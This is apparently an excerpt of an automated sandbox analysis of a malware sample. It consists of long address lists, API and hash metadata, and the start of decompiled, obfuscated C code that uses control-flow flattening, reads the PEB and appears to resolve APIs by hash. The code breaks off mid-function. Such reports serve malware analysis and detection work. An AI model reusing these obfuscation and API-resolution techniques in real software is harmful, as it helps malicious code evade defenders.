                                                                                                                                                        0x00fd7975
                                                                                                                                                        0x00fd7987
                                                                                                                                                        0x00fd6fa1
                                                                                                                                                        0x00fd6fa7
                                                                                                                                                        0x00fd7994
                                                                                                                                                        0x00fd799c
                                                                                                                                                        0x00fd79b2
                                                                                                                                                        0x00fd6fad
                                                                                                                                                        0x00fd6fad
                                                                                                                                                        0x00fd6fb5
                                                                                                                                                        0x00fd6fbb
                                                                                                                                                        0x00fd6fbb
                                                                                                                                                        0x00fd6fb5
                                                                                                                                                        0x00fd6fa7
                                                                                                                                                        0x00fd68f4
                                                                                                                                                        0x00fd68fa
                                                                                                                                                        0x00fd73f4
                                                                                                                                                        0x00fd73f9
                                                                                                                                                        0x00fd73ff
                                                                                                                                                        0x00fd7405
                                                                                                                                                        0x00fd740e
                                                                                                                                                        0x00fd7416
                                                                                                                                                        0x00fd7418
                                                                                                                                                        0x00fd7420
                                                                                                                                                        0x00fd7423
                                                                                                                                                        0x00fd6900
                                                                                                                                                        0x00fd6906
                                                                                                                                                        0x00fd742d
                                                                                                                                                        0x00fd7442
                                                                                                                                                        0x00fd690c
                                                                                                                                                        0x00fd690c
                                                                                                                                                        0x00fd6914
                                                                                                                                                        0x00fd6922
                                                                                                                                                        0x00fd692f
                                                                                                                                                        0x00fd6939
                                                                                                                                                        0x00fd693b
                                                                                                                                                        0x00fd6951
                                                                                                                                                        0x00fd6951
                                                                                                                                                        0x00fd6914
                                                                                                                                                        0x00fd6906
                                                                                                                                                        0x00fd68fa
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd68e2
                                                                                                                                                        0x00fd6797
                                                                                                                                                        0x00fd6a48
                                                                                                                                                        0x00fd7079
                                                                                                                                                        0x00fd7a30
                                                                                                                                                        0x00fd7a35
                                                                                                                                                        0x00fd7a3f
                                                                                                                                                        0x00fd7a55
                                                                                                                                                        0x00fd7a57
                                                                                                                                                        0x00fd7a5f
                                                                                                                                                        0x00fd707f
                                                                                                                                                        0x00fd707f
                                                                                                                                                        0x00fd7087
                                                                                                                                                        0x00fd7095
                                                                                                                                                        0x00fd709b
                                                                                                                                                        0x00fd70a3
                                                                                                                                                        0x00fd70a6
                                                                                                                                                        0x00fd70a6
                                                                                                                                                        0x00fd7087
                                                                                                                                                        0x00fd6a4e
                                                                                                                                                        0x00fd6a54
                                                                                                                                                        0x00fd7581
                                                                                                                                                        0x00fd758f
                                                                                                                                                        0x00fd7595
                                                                                                                                                        0x00fd75a2
                                                                                                                                                        0x00fd75a7
                                                                                                                                                        0x00fd75ad
                                                                                                                                                        0x00fd75b3
                                                                                                                                                        0x00fd75ba
                                                                                                                                                        0x00fd75bc
                                                                                                                                                        0x00fd6a5a
                                                                                                                                                        0x00fd6a60
                                                                                                                                                        0x00fd75ce
                                                                                                                                                        0x00fd75d6
                                                                                                                                                        0x00fd75eb
                                                                                                                                                        0x00fd6a66
                                                                                                                                                        0x00fd6a66
                                                                                                                                                        0x00fd6a6e
                                                                                                                                                        0x00fd6a86
                                                                                                                                                        0x00fd6a8d
                                                                                                                                                        0x00fd6a8d
                                                                                                                                                        0x00fd6a6e
                                                                                                                                                        0x00fd6a60
                                                                                                                                                        0x00fd6a54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6a48
                                                                                                                                                        0x00fd67a3
                                                                                                                                                        0x00fd6d79
                                                                                                                                                        0x00fd7846
                                                                                                                                                        0x00fd785d
                                                                                                                                                        0x00fd7860
                                                                                                                                                        0x00fd786c
                                                                                                                                                        0x00fd7874
                                                                                                                                                        0x00fd7a23
                                                                                                                                                        0x00fd7a23
                                                                                                                                                        0x00fd7a28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7a28
                                                                                                                                                        0x00fd6d85
                                                                                                                                                        0x00fd787b
                                                                                                                                                        0x00fd7880
                                                                                                                                                        0x00fd6d8b
                                                                                                                                                        0x00fd6d8b
                                                                                                                                                        0x00fd6d93
                                                                                                                                                        0x00fd6da1
                                                                                                                                                        0x00fd6daf
                                                                                                                                                        0x00fd6db5
                                                                                                                                                        0x00fd6dc2
                                                                                                                                                        0x00fd6dc7
                                                                                                                                                        0x00fd6dcd
                                                                                                                                                        0x00fd6dd3
                                                                                                                                                        0x00fd6dda
                                                                                                                                                        0x00fd6ddc
                                                                                                                                                        0x00fd6ddc
                                                                                                                                                        0x00fd6d93
                                                                                                                                                        0x00fd67a9
                                                                                                                                                        0x00fd67af
                                                                                                                                                        0x00fd72ca
                                                                                                                                                        0x00fd72d5
                                                                                                                                                        0x00fd67b5
                                                                                                                                                        0x00fd67bb
                                                                                                                                                        0x00fd72e4
                                                                                                                                                        0x00fd72e9
                                                                                                                                                        0x00fd72f1
                                                                                                                                                        0x00fd72f9
                                                                                                                                                        0x00fd7301
                                                                                                                                                        0x00fd7306
                                                                                                                                                        0x00fd67c1
                                                                                                                                                        0x00fd67c1
                                                                                                                                                        0x00fd67c9
                                                                                                                                                        0x00fd67cf
                                                                                                                                                        0x00fd67e7
                                                                                                                                                        0x00fd67ea
                                                                                                                                                        0x00fd67c9
                                                                                                                                                        0x00fd67bb
                                                                                                                                                        0x00fd67af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd67a3
                                                                                                                                                        0x00fd66bb
                                                                                                                                                        0x00fd683f
                                                                                                                                                        0x00fd6aee
                                                                                                                                                        0x00fd70ea
                                                                                                                                                        0x00fd7671
                                                                                                                                                        0x00fd7671
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7671
                                                                                                                                                        0x00fd70f0
                                                                                                                                                        0x00fd70f8
                                                                                                                                                        0x00fd7107
                                                                                                                                                        0x00fd710e
                                                                                                                                                        0x00fd710e
                                                                                                                                                        0x00fd6af4
                                                                                                                                                        0x00fd6afa
                                                                                                                                                        0x00fd7646
                                                                                                                                                        0x00fd7651
                                                                                                                                                        0x00fd6b00
                                                                                                                                                        0x00fd6b00
                                                                                                                                                        0x00fd6b09
                                                                                                                                                        0x00fd6b0f
                                                                                                                                                        0x00fd6b17
                                                                                                                                                        0x00fd6b25
                                                                                                                                                        0x00fd6b33
                                                                                                                                                        0x00fd6b3b
                                                                                                                                                        0x00fd6b50
                                                                                                                                                        0x00fd6b50
                                                                                                                                                        0x00fd6b17
                                                                                                                                                        0x00fd6b09
                                                                                                                                                        0x00fd6afa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6aee
                                                                                                                                                        0x00fd684b
                                                                                                                                                        0x00fd6e14
                                                                                                                                                        0x00fd6e1c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6e28
                                                                                                                                                        0x00fd7914
                                                                                                                                                        0x00fd791e
                                                                                                                                                        0x00fd7925
                                                                                                                                                        0x00fd792f
                                                                                                                                                        0x00fd7936
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7936
                                                                                                                                                        0x00fd6e2e
                                                                                                                                                        0x00fd6e36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6e3c
                                                                                                                                                        0x00fd6e3f
                                                                                                                                                        0x00fd6e45
                                                                                                                                                        0x00fd6e48
                                                                                                                                                        0x00fd6e4b
                                                                                                                                                        0x00fd6e50
                                                                                                                                                        0x00fd6e67
                                                                                                                                                        0x00fd6e6f
                                                                                                                                                        0x00fd6e74
                                                                                                                                                        0x00fd6e7a
                                                                                                                                                        0x00fd6e7d
                                                                                                                                                        0x00fd6e85
                                                                                                                                                        0x00fd6e90
                                                                                                                                                        0x00fd6ea3
                                                                                                                                                        0x00fd6ed1
                                                                                                                                                        0x00fd6ed1
                                                                                                                                                        0x00fd6ed9
                                                                                                                                                        0x00fd6ee1
                                                                                                                                                        0x00fd6ee4
                                                                                                                                                        0x00fd6ef1
                                                                                                                                                        0x00fd6f01
                                                                                                                                                        0x00fd6f0f
                                                                                                                                                        0x00fd6f14
                                                                                                                                                        0x00fd6f27
                                                                                                                                                        0x00fd6f2d
                                                                                                                                                        0x00fd6f30
                                                                                                                                                        0x00fd6f33
                                                                                                                                                        0x00fd6f36
                                                                                                                                                        0x00fd6f39
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6f39
                                                                                                                                                        0x00fd6ea7
                                                                                                                                                        0x00fd6ea7
                                                                                                                                                        0x00fd6eb2
                                                                                                                                                        0x00fd6ec0
                                                                                                                                                        0x00fd6eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6ea7
                                                                                                                                                        0x00fd6857
                                                                                                                                                        0x00fd7334
                                                                                                                                                        0x00fd7349
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7349
                                                                                                                                                        0x00fd6863
                                                                                                                                                        0x00fd688c
                                                                                                                                                        0x00fd688c
                                                                                                                                                        0x00fd6891
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6891
                                                                                                                                                        0x00fd6865
                                                                                                                                                        0x00fd686d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6873
                                                                                                                                                        0x00fd687b
                                                                                                                                                        0x00fd6881
                                                                                                                                                        0x00fd6889
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6889
                                                                                                                                                        0x00fd686d
                                                                                                                                                        0x00fd66c7
                                                                                                                                                        0x00fd66d3
                                                                                                                                                        0x00fd6c54
                                                                                                                                                        0x00fd7726
                                                                                                                                                        0x00fd7743
                                                                                                                                                        0x00fd6c5a
                                                                                                                                                        0x00fd6c60
                                                                                                                                                        0x00fd7753
                                                                                                                                                        0x00fd775b
                                                                                                                                                        0x00fd7765
                                                                                                                                                        0x00fd776a
                                                                                                                                                        0x00fd6c66
                                                                                                                                                        0x00fd6c66
                                                                                                                                                        0x00fd6c6e
                                                                                                                                                        0x00fd6c79
                                                                                                                                                        0x00fd6c7e
                                                                                                                                                        0x00fd6c8b
                                                                                                                                                        0x00fd6c90
                                                                                                                                                        0x00fd6c98
                                                                                                                                                        0x00fd6ca0
                                                                                                                                                        0x00fd6ca3
                                                                                                                                                        0x00fd6cad
                                                                                                                                                        0x00fd6cb3
                                                                                                                                                        0x00fd6cb9
                                                                                                                                                        0x00fd6cbe
                                                                                                                                                        0x00fd6cc3
                                                                                                                                                        0x00fd6cd2
                                                                                                                                                        0x00fd6cd5
                                                                                                                                                        0x00fd6cd8
                                                                                                                                                        0x00fd6cdf
                                                                                                                                                        0x00fd6cef
                                                                                                                                                        0x00fd6cf7
                                                                                                                                                        0x00fd6cfb
                                                                                                                                                        0x00fd6d08
                                                                                                                                                        0x00fd6d18
                                                                                                                                                        0x00fd6d22
                                                                                                                                                        0x00fd6d2a
                                                                                                                                                        0x00fd6d31
                                                                                                                                                        0x00fd6d37
                                                                                                                                                        0x00fd6d37
                                                                                                                                                        0x00fd6c6e
                                                                                                                                                        0x00fd6c60
                                                                                                                                                        0x00fd66d9
                                                                                                                                                        0x00fd66df
                                                                                                                                                        0x00fd7215
                                                                                                                                                        0x00fd7224
                                                                                                                                                        0x00fd722c
                                                                                                                                                        0x00fd7234
                                                                                                                                                        0x00fd7240
                                                                                                                                                        0x00fd7255
                                                                                                                                                        0x00fd66e5
                                                                                                                                                        0x00fd66eb
                                                                                                                                                        0x00fd725d
                                                                                                                                                        0x00fd7262
                                                                                                                                                        0x00fd66f1
                                                                                                                                                        0x00fd66f1
                                                                                                                                                        0x00fd66f9
                                                                                                                                                        0x00fd66fb
                                                                                                                                                        0x00fd6703
                                                                                                                                                        0x00fd6703
                                                                                                                                                        0x00fd66f9
                                                                                                                                                        0x00fd66eb
                                                                                                                                                        0x00fd66df
                                                                                                                                                        0x00fd69b7
                                                                                                                                                        0x00fd69bd
                                                                                                                                                        0x00fd6fec
                                                                                                                                                        0x00fd79de
                                                                                                                                                        0x00fd79f0
                                                                                                                                                        0x00fd7a0b
                                                                                                                                                        0x00fd6ff2
                                                                                                                                                        0x00fd6ff2
                                                                                                                                                        0x00fd6ffa
                                                                                                                                                        0x00fd7000
                                                                                                                                                        0x00fd700b
                                                                                                                                                        0x00fd700b
                                                                                                                                                        0x00fd6ffa
                                                                                                                                                        0x00fd69c3
                                                                                                                                                        0x00fd69c9
                                                                                                                                                        0x00fd744a
                                                                                                                                                        0x00fd7452
                                                                                                                                                        0x00fd7467
                                                                                                                                                        0x00fd69cf
                                                                                                                                                        0x00fd69d5
                                                                                                                                                        0x00fd7477
                                                                                                                                                        0x00fd7484
                                                                                                                                                        0x00fd7491
                                                                                                                                                        0x00fd7499
                                                                                                                                                        0x00fd74a1
                                                                                                                                                        0x00fd74a9
                                                                                                                                                        0x00fd74b1
                                                                                                                                                        0x00fd74c2
                                                                                                                                                        0x00fd69db
                                                                                                                                                        0x00fd69db
                                                                                                                                                        0x00fd69e3
                                                                                                                                                        0x00fd69e9
                                                                                                                                                        0x00fd69e9
                                                                                                                                                        0x00fd69e3
                                                                                                                                                        0x00fd69d5
                                                                                                                                                        0x00fd69c9
                                                                                                                                                        0x00fd69bd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd670a
                                                                                                                                                        0x00fd6710
                                                                                                                                                        0x00fd67f7
                                                                                                                                                        0x00fd695f
                                                                                                                                                        0x00fd6bfe
                                                                                                                                                        0x00fd7196
                                                                                                                                                        0x00fd7b18
                                                                                                                                                        0x00fd7b1e
                                                                                                                                                        0x00fd719c
                                                                                                                                                        0x00fd719c
                                                                                                                                                        0x00fd71a4
                                                                                                                                                        0x00fd71aa
                                                                                                                                                        0x00fd71cc
                                                                                                                                                        0x00fd71d2
                                                                                                                                                        0x00fd71dc
                                                                                                                                                        0x00fd71ec
                                                                                                                                                        0x00fd71f4
                                                                                                                                                        0x00fd7206
                                                                                                                                                        0x00fd7206
                                                                                                                                                        0x00fd71a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7196
                                                                                                                                                        0x00fd6c0a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6c10
                                                                                                                                                        0x00fd6c16
                                                                                                                                                        0x00fd76ef
                                                                                                                                                        0x00fd76f3
                                                                                                                                                        0x00fd76fb
                                                                                                                                                        0x00fd7700
                                                                                                                                                        0x00fd770d
                                                                                                                                                        0x00fd7714
                                                                                                                                                        0x00fd6c1c
                                                                                                                                                        0x00fd6c1c
                                                                                                                                                        0x00fd6c24
                                                                                                                                                        0x00fd6c31
                                                                                                                                                        0x00fd6c46
                                                                                                                                                        0x00fd6c46
                                                                                                                                                        0x00fd6c24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6c16
                                                                                                                                                        0x00fd6c0a
                                                                                                                                                        0x00fd696b
                                                                                                                                                        0x00fd6fcd
                                                                                                                                                        0x00fd79ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd79ce
                                                                                                                                                        0x00fd6fd3
                                                                                                                                                        0x00fd6fdb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7a8f
                                                                                                                                                        0x00fd7a8f
                                                                                                                                                        0x00fd7a92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7a92
                                                                                                                                                        0x00fd6977
                                                                                                                                                        0x00fd7b28
                                                                                                                                                        0x00fd7b42
                                                                                                                                                        0x00fd697d
                                                                                                                                                        0x00fd697d
                                                                                                                                                        0x00fd6985
                                                                                                                                                        0x00fd698b
                                                                                                                                                        0x00fd6990
                                                                                                                                                        0x00fd699b
                                                                                                                                                        0x00fd69a5
                                                                                                                                                        0x00fd69ad
                                                                                                                                                        0x00fd69ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6985
                                                                                                                                                        0x00fd6977
                                                                                                                                                        0x00fd6803
                                                                                                                                                        0x00fd6a9c
                                                                                                                                                        0x00fd70b6
                                                                                                                                                        0x00fd7a69
                                                                                                                                                        0x00fd7a75
                                                                                                                                                        0x00fd7a7a
                                                                                                                                                        0x00fd7a80
                                                                                                                                                        0x00fd7a86
                                                                                                                                                        0x00fd7a8d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7a8d
                                                                                                                                                        0x00fd70bc
                                                                                                                                                        0x00fd70c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd70ca
                                                                                                                                                        0x00fd70d2
                                                                                                                                                        0x00fd70d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd70d2
                                                                                                                                                        0x00fd6aa8
                                                                                                                                                        0x00fd75ff
                                                                                                                                                        0x00fd7603
                                                                                                                                                        0x00fd760f
                                                                                                                                                        0x00fd7624
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7624
                                                                                                                                                        0x00fd6ab4
                                                                                                                                                        0x00fd762c
                                                                                                                                                        0x00fd7631
                                                                                                                                                        0x00fd7636
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7636
                                                                                                                                                        0x00fd6aba
                                                                                                                                                        0x00fd6ac2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6ac8
                                                                                                                                                        0x00fd6ad1
                                                                                                                                                        0x00fd6ad9
                                                                                                                                                        0x00fd6adb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6adb
                                                                                                                                                        0x00fd6ac2
                                                                                                                                                        0x00fd680f
                                                                                                                                                        0x00fd6dec
                                                                                                                                                        0x00fd7894
                                                                                                                                                        0x00fd78a1
                                                                                                                                                        0x00fd78a6
                                                                                                                                                        0x00fd78ae
                                                                                                                                                        0x00fd78bb
                                                                                                                                                        0x00fd78c3
                                                                                                                                                        0x00fd6df2
                                                                                                                                                        0x00fd6df8
                                                                                                                                                        0x00fd78d5
                                                                                                                                                        0x00fd78ea
                                                                                                                                                        0x00fd78f2
                                                                                                                                                        0x00fd7907
                                                                                                                                                        0x00fd6dfe
                                                                                                                                                        0x00fd6dfe
                                                                                                                                                        0x00fd6e06
                                                                                                                                                        0x00fd6e0c
                                                                                                                                                        0x00fd6e0c
                                                                                                                                                        0x00fd6e06
                                                                                                                                                        0x00fd6df8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6dec
                                                                                                                                                        0x00fd681b
                                                                                                                                                        0x00fd732c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd732c
                                                                                                                                                        0x00fd6827
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6829
                                                                                                                                                        0x00fd6831
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6837
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6837
                                                                                                                                                        0x00fd6831
                                                                                                                                                        0x00fd671c
                                                                                                                                                        0x00fd689f
                                                                                                                                                        0x00fd6b5e
                                                                                                                                                        0x00fd711e
                                                                                                                                                        0x00fd7aa4
                                                                                                                                                        0x00fd7aaa
                                                                                                                                                        0x00fd7ab2
                                                                                                                                                        0x00fd7ac5
                                                                                                                                                        0x00fd7aca
                                                                                                                                                        0x00fd7ad0
                                                                                                                                                        0x00fd7ad6
                                                                                                                                                        0x00fd7add
                                                                                                                                                        0x00fd7adf
                                                                                                                                                        0x00fd7ae9
                                                                                                                                                        0x00fd7124
                                                                                                                                                        0x00fd7124
                                                                                                                                                        0x00fd712c
                                                                                                                                                        0x00fd7132
                                                                                                                                                        0x00fd7137
                                                                                                                                                        0x00fd7137
                                                                                                                                                        0x00fd712c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd711e
                                                                                                                                                        0x00fd6b6a
                                                                                                                                                        0x00fd765b
                                                                                                                                                        0x00fd7667
                                                                                                                                                        0x00fd766f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6b70
                                                                                                                                                        0x00fd6b76
                                                                                                                                                        0x00fd767b
                                                                                                                                                        0x00fd6b7c
                                                                                                                                                        0x00fd6b7c
                                                                                                                                                        0x00fd6b84
                                                                                                                                                        0x00fd6b8f
                                                                                                                                                        0x00fd6b94
                                                                                                                                                        0x00fd6b99
                                                                                                                                                        0x00fd6b9c
                                                                                                                                                        0x00fd6ba1
                                                                                                                                                        0x00fd6ba1
                                                                                                                                                        0x00fd6b84
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6b76
                                                                                                                                                        0x00fd6b6a
                                                                                                                                                        0x00fd68ab
                                                                                                                                                        0x00fd6f41
                                                                                                                                                        0x00fd6f4a
                                                                                                                                                        0x00fd6f56
                                                                                                                                                        0x00fd7940
                                                                                                                                                        0x00fd794f
                                                                                                                                                        0x00fd7951
                                                                                                                                                        0x00fd6f5c
                                                                                                                                                        0x00fd6f5c
                                                                                                                                                        0x00fd6f64
                                                                                                                                                        0x00fd6f71
                                                                                                                                                        0x00fd6f75
                                                                                                                                                        0x00fd6f8d
                                                                                                                                                        0x00fd6f8d
                                                                                                                                                        0x00fd6f64
                                                                                                                                                        0x00fd6f56
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd6f4a
                                                                                                                                                        0x00fd68b7
                                                                                                                                                        0x00fd7358
                                                                                                                                                        0x00fd7364
                                                                                                                                                        0x00fd736c
                                                                                                                                                        0x00fd7384
                                                                                                                                                        0x00fd738b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd738b
                                                                                                                                                        0x00fd68c3
                                                                                                                                                        0x00fd739c
                                                                                                                                                        0x00fd73ac
                                                                                                                                                        0x00fd73bc
                                                                                                                                                        0x00fd73bf
                                                                                                                                                        0x00fd73c7
                                                                                                                                                        0x00fd73c9
                                                                                                                                                        0x00fd73d1
                                                                                                                                                        0x00fd73d9
                                                                                                                                                        0x00fd73ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd73ea
                                                                                                                                                        0x00fd68c9
                                                                                                                                                        0x00fd68d1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd68d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd68d7
                                                                                                                                                        0x00fd68d1
                                                                                                                                                        0x00fd6728
                                                                                                                                                        0x00fd69fb
                                                                                                                                                        0x00fd701b
                                                                                                                                                        0x00fd7a13
                                                                                                                                                        0x00fd7a1b
                                                                                                                                                        0x00fd7a20
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd7a20
                                                                                                                                                        0x00fd7021
                                                                                                                                                        0x00fd7029
                                                                                                                                                        0x00fd7037
                                                                                                                                                        0x00fd703f
                                                                                                                                                        0x00fd7049
                                                                                                                                                        0x00fd7057
                                                                                                                                                        0x00fd706b
                                                                                                                                                        0x00fd706b
                                                                                                                                                        0x00fd6a01
                                                                                                                                                        0x00fd6a07
                                                                                                                                                        0x00fd74d1
                                                                                                                                                        0x00fd74e9
                                                                                                                                                        0x00fd74f5
                                                                                                                                                        0x00fd74fd
                                                                                                                                                        0x00fd7509
                                                                                                                                                        0x00fd751e
                                                                                                                                                        0x00fd7523
                                                                                                                                                        0x00fd6a0d
                                                                                                                                                        0x00fd6a13
                                                                                                                                                        0x00fd752c
                                                                                                                                                        0x00fd7532
                                                                                                                                                        0x00fd7542
                                                                                                                                                        0x00fd7550
                                                                                                                                                        0x00fd7567
                                                                                                                                                        0x00fd756f
                                                                                                                                                        0x00fd6a19
                                                                                                                                                        0x00fd6a19
                                                                                                                                                        0x00fd6a21
                                                                                                                                                        0x00fd6a3a
                                                                                                                                                        0x00fd6a3a
                                                                                                                                                        0x00fd6a21
                                                                                                                                                        0x00fd6a13
                                                                                                                                                        0x00fd6a07
                                                                                                                                                        0x00fd672e
                                                                                                                                                        0x00fd6734
                                                                                                                                                        0x00fd6d47
                                                                                                                                                        0x00fd7780
                                                                                                                                                        0x00fd7784
                                                                                                                                                        0x00fd778c
                                                                                                                                                        0x00fd7791
                                                                                                                                                        0x00fd779e
                                                                                                                                                        0x00fd77b0
                                                                                                                                                        0x00fd77c2
                                                                                                                                                        0x00fd77d8
                                                                                                                                                        0x00fd77e8
                                                                                                                                                        0x00fd77fa
                                                                                                                                                        0x00fd7806
                                                                                                                                                        0x00fd780a
                                                                                                                                                        0x00fd7816
                                                                                                                                                        0x00fd781d
                                                                                                                                                        0x00fd6d4d
                                                                                                                                                        0x00fd6d53
                                                                                                                                                        0x00fd782d
                                                                                                                                                        0x00fd7838
                                                                                                                                                        0x00fd783c
                                                                                                                                                        0x00fd6d59
                                                                                                                                                        0x00fd6d59
                                                                                                                                                        0x00fd6d61
                                                                                                                                                        0x00fd6d67
                                                                                                                                                        0x00fd6d67
                                                                                                                                                        0x00fd6d61
                                                                                                                                                        0x00fd6d53
                                                                                                                                                        0x00fd673a
                                                                                                                                                        0x00fd6740
                                                                                                                                                        0x00fd727a
                                                                                                                                                        0x00fd7282
                                                                                                                                                        0x00fd7297
                                                                                                                                                        0x00fd6746
                                                                                                                                                        0x00fd674c
                                                                                                                                                        0x00fd72a6
                                                                                                                                                        0x00fd72aa
                                                                                                                                                        0x00fd72c2
                                                                                                                                                        0x00fd6752
                                                                                                                                                        0x00fd6752
                                                                                                                                                        0x00fd675a
                                                                                                                                                        0x00fd6760
                                                                                                                                                        0x00fd6768
                                                                                                                                                        0x00fd676d
                                                                                                                                                        0x00fd6770
                                                                                                                                                        0x00fd6775
                                                                                                                                                        0x00fd6775
                                                                                                                                                        0x00fd675a
                                                                                                                                                        0x00fd674c
                                                                                                                                                        0x00fd6740
                                                                                                                                                        0x00fd6734
                                                                                                                                                        0x00fd6728

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00FDCDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00FE0A77), ref: 00FDCE20
                                                                                                                                                        • WSAStartup.WS2_32 ref: 00FD7416
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.465846592.0000000000FD1000.00000020.00000001.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.465840421.0000000000FD0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465861413.0000000000FE4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001A.00000002.465867326.0000000000FE7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapStartup
                                                                                                                                                        • String ID: >en$?en$?en$[O$\O$\O$a'/$b'/$b'/$b'/
                                                                                                                                                        • API String ID: 1761151125-3790037689
                                                                                                                                                        • Opcode ID: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction ID: 227c0d410497ccb1778236034fa2a2365cd880af2f59043aaf8e871f477cb3e6
                                                                                                                                                        • Opcode Fuzzy Hash: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction Fuzzy Hash: F6A265366197C486CB789F19E4903AE77A2F7C8B54F54401BDA8ECBB64DB39C840EB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00FE02A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                        			E00FE02A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t196;
				signed int _t200;
				void* _t257;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t196 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t257 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t199 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t200 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t200 <= 0xb0b3b625) {
							__eflags = _t200 - 0x93c76e2c;
							if(_t200 > 0x93c76e2c) {
								__eflags = _t200 - 0x9fd7756a;
								if(_t200 > 0x9fd7756a) {
									__eflags = _t200 - 0x9fd7756b;
									if(_t200 == 0x9fd7756b) {
										E00FDCDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E00FDFAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E00FDFAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0xfe02a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0xfe02a4;
